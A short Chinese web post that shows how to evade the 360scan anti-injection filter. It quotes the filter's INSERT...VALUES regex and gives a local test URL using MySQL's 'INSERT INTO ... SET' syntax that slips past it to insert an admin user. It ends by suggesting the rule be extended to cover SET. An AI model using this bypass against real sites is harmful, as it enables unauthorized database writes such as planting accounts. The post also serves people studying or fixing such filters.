Mysql语法绕过360scan insert防注入方法
360scan正则:INSERT\\s+INTO.+?VALUES<p>其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =</p>
<p>提交:</p>
http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456')
<p align="center"><img class="alignnone size-full wp-image-1211" alt="2" width="673" height="498" src="https://img.jbzj.com/file_images/article/201405/201405071140282.jpg" /></p>
<p>提交set语法:</p>
<div>http://localhost/360.php?sql=insert into user set user='admin',pass='123456'</div>
<p align="center"><img class="alignnone size-full wp-image-1212" alt="1" width="1169" height="507" src="https://img.jbzj.com/file_images/article/201405/201405071140283.jpg" /></p>
<p>修复方法当然最好是加上set了。</p>
頁:
[1]